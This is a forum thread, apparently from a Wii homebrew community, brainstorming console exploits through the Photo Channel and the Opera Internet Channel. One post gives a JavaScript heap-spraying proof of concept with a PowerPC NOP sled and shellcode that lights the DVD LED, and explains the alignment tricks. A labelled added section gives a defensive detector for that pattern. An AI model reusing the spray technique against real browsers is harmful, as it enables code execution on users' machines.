Idea for new Wii exploits? December 03, 2010 01:04PM | Registered: 14 years ago Posts: 21 |
Re: Idea for new Wii exploits? December 03, 2010 05:34PM | Moderator Registered: 15 years ago Posts: 5,075 |
Re: Idea for new Wii exploits? December 06, 2010 02:59AM | Registered: 14 years ago Posts: 21 |
You're right! They're just different file extensions for the same file format! :P
Quote
SifJar
(...) I thought AAC and M4A were the same anyway? Maybe I got confused... (...)
Re: Idea for new Wii exploits? December 07, 2010 03:52PM | Registered: 14 years ago Posts: 21 |
Btw, Photo Channel v1.1 still supports AAC/M4A files, like mentioned here! ;)
Quote
SifJar
Also, I believe in v1.1, they removed the music playing, so no MP3, AAC or M4A
Re: Idea for new Wii exploits? December 07, 2010 07:18PM | Admin Registered: 16 years ago Posts: 3,247 |
Re: Idea for new Wii exploits? December 08, 2010 12:01PM | Registered: 15 years ago Posts: 379 |
Re: Idea for new Wii exploits? February 08, 2011 07:43PM | Registered: 13 years ago Posts: 3 |
Re: Idea for new Wii exploits? February 09, 2011 06:20PM | Registered: 15 years ago Posts: 188 |
That php exec func is _only_ for executing software on the web server, not the client.
Quote
otto
[php.bigresource.com]
"Execute Exe File From Php Code Through Browser"
Maybe host a .dol file on a webserver somewhere?
Re: Idea for new Wii exploits? February 09, 2011 09:13PM | Registered: 15 years ago Posts: 1,597 |
Re: Idea for new Wii exploits? February 09, 2011 09:32PM | Moderator Registered: 15 years ago Posts: 5,075 |
Re: Idea for new Wii exploits? February 09, 2011 09:40PM | Registered: 15 years ago Posts: 1,597 |
Re: Idea for new Wii exploits? February 09, 2011 11:38PM | Admin Registered: 16 years ago Posts: 3,247 |
Re: Idea for new Wii exploits? February 10, 2011 04:03AM | Registered: 13 years ago Posts: 3 |
Quote
yellowstar
That php exec func is _only_ for executing software on the web server, not the client.
Quote
otto
[php.bigresource.com]
"Execute Exe File From Php Code Through Browser"
Maybe host a .dol file on a webserver somewhere?
Re: Idea for new Wii exploits? February 10, 2011 07:01PM | Moderator Registered: 15 years ago Posts: 5,075 |
Re: Idea for new Wii exploits? February 10, 2011 07:22PM | Registered: 15 years ago Posts: 188 |
Quote
otto
Quote
yellowstar
That php exec func is _only_ for executing software on the web server, not the client.
Quote
otto
[php.bigresource.com]
"Execute Exe File From Php Code Through Browser"
Maybe host a .dol file on a webserver somewhere?
I see. I know that Opera has some decent exploits. Most of the stuff I have read is mainly for Opera 11. I've done some more reading on Opera 9 for Wii and it doesn't even look like it supports php scripts anyway.
[www.opera.com]
But it does have XML support
[securitytracker.com] - this one is to exploit a .dll file, but I'm still looking around at some other sites as well.
I know that packetstorm has some opera exploits in their database...
[packetstormsecurity.org]
If I am able to compromise the Wii through Opera and the Internet Channel, would I have access to the Wii's NAND?
Also back to the original subject and PhotoChannel. Has anyone come up with a steganography program that can launch embedded code?
Re: Idea for new Wii exploits? February 10, 2011 08:34PM | Registered: 14 years ago Posts: 21 |
Re: Idea for new Wii exploits? February 24, 2011 11:50PM | Registered: 15 years ago Posts: 1 |
$ strings -t x batman.dol | grep 'Metrowerks Target'
287 Metrowerks Target Resident Kernel for PowerPC

$ xxd 00000028.app | grep 'arget Re' -A 3 -B 1
0000390: a638 1021 0010 33bf 4d65 7472 006f 7765  .8.!..3.Metr.owe
00003a0: 726b 7320 5400 6172 6765 7420 5265 0073  rks T.arget Re.s
00003b0: 6964 656e 7420 4b00 6572 6e65 6c20 666f  ident K.ernel fo
00003c0: 1372 2050 3022 5043 00b4 2c0a 601b 0c48  .r P0"PC..,.`..H
00003d0: 092f 3c0c 20d6 0181 a97c 5100 43a6 7c5a  ./<. ....|Q.C.|Z
[fwrite patch for inetchannel]
Attempted to fetch instruction from invalid address 0x91150bb8 (read from SRR0)

to make it short, you can control the data in that region. how? allocating stuff on the heap is quite easy in a browser, just allocate some data in the java script virtual machine and do that several times (aka "heap spraying"). my code for that:
SCRIPT
var i = 0x3377331; //force the VM to align the data, since there's code after it
var str = "\u6000\u0000"; //nop
//place many many NOPs here, since we don't know exactly where it jumps in here.
for (i = 0; i < 20; i++) {
    str += str;
}
//enlighten the DVD-drive LED!
str += "\u3d20\ucd80"; //lis 9,0xcd80
str += "\u3900\u0020"; //li 8,0x20
str += "\u9109\u00c0"; //stw 8,0xc0(9)
str += "\u4e80\u0020"; //blr
str += "\u6000"; //proper padding. again alignment stuff
arr = new Array(100);
for (i = 0; i < 100; i++) {
    arr[i] = str;
}
alert(arr[4]);
/SCRIPT
BODY
IFRAME src="evil_xml_exploit.xml"
/BODY
<!-- well, correct the html tags above on your own. somehow the forum software fucks them up :) -->

on x86 it's a bit easier than here, because a nop is just "0x90", i.e. just one byte, so you don't have to care about alignment in this case. fortunately, you can fool the java script VM by allocating a variable of the size u32. it's better for the VM to place that on an aligned address, in order to load/store it with one instruction. therefore, data after that is also (properly) aligned.
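Added example, not part of the original post or thread: a defender-side static check for the pattern the post above describes (a string of `\u`-escaped no-op words doubled in a loop and copied into a large array). The function names, the thresholds and both sample inputs are assumptions made for illustration, and it goes slightly beyond the post by also flagging the one-byte x86 `0x90` case it mentions.

```javascript
// Added example: static heuristic for the spray pattern described in the post above.
// Function names, thresholds and both samples are assumptions made for this example.
const PPC_NOP = 0x60000000;  // "ori 0,0,0", written "\u6000\u0000" in the post
const X86_NOP_PAIR = 0x9090; // two one-byte x86 nops packed into one UTF-16 unit

// Decode a literal made of \uXXXX escapes into its 16-bit code units.
function decodeUnits(literal) {
  const units = [];
  const re = /\\u([0-9a-fA-F]{4})/g;
  let m;
  while ((m = re.exec(literal)) !== null) units.push(parseInt(m[1], 16));
  return units;
}

// Pair 16-bit units, high half first, into 32-bit words (one PowerPC instruction each).
function toWords(units) {
  const words = [];
  for (let i = 0; i + 1 < units.length; i += 2) {
    words.push(((units[i] << 16) | units[i + 1]) >>> 0);
  }
  return words;
}

function scanScript(source) {
  const f = { nopLiterals: [], doublingLoop: false, bulkCopies: false, suspicious: false };
  const litRe = /"((?:\\u[0-9a-fA-F]{4})+)"/g; // literals that are only \u escapes
  let m;
  while ((m = litRe.exec(source)) !== null) {
    const units = decodeUnits(m[1]);
    if (toWords(units).includes(PPC_NOP)) f.nopLiterals.push({ arch: "ppc", text: m[1] });
    else if (units.includes(X86_NOP_PAIR)) f.nopLiterals.push({ arch: "x86", text: m[1] });
  }
  // "x += x" inside a for loop: the string doubles on every pass.
  f.doublingLoop = /for\s*\([^)]*\)\s*\{[^}]*\b(\w+)\s*\+=\s*\1\s*;/.test(source);
  // new Array(n) with n >= 50: room for many copies of one buffer.
  const arr = /new\s+Array\(\s*(\d+)\s*\)/.exec(source);
  f.bulkCopies = arr !== null && Number(arr[1]) >= 50;
  f.suspicious = f.nopLiterals.length > 0 && (f.doublingLoop || f.bulkCopies);
  return f;
}

// Constructed samples (not captured traffic): a pattern-only snippet and benign text handling.
const SAMPLE_SPRAY =
  'var s = "\\u6000\\u0000"; for (i = 0; i < 20; i++) { s += s; } var a = new Array(100);';
const SAMPLE_BENIGN =
  'var s = "\\u00e9\\u00e8"; var t = ""; for (i = 0; i < 3; i++) { t += s; }';
console.log(scanScript(SAMPLE_SPRAY).suspicious, scanScript(SAMPLE_BENIGN).suspicious);
```

A literal only counts when it is combined with a doubling loop or a large array, so ordinary scripts that use `\u` escapes for accented text are not flagged.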
Re: Idea for new Wii exploits? February 25, 2011 12:21AM | Admin Registered: 16 years ago Posts: 3,247 |
Re: Idea for new Wii exploits? February 25, 2011 10:12AM | Registered: 15 years ago Posts: 379 |
Re: Idea for new Wii exploits? February 26, 2011 06:02AM | Registered: 13 years ago Posts: 3 |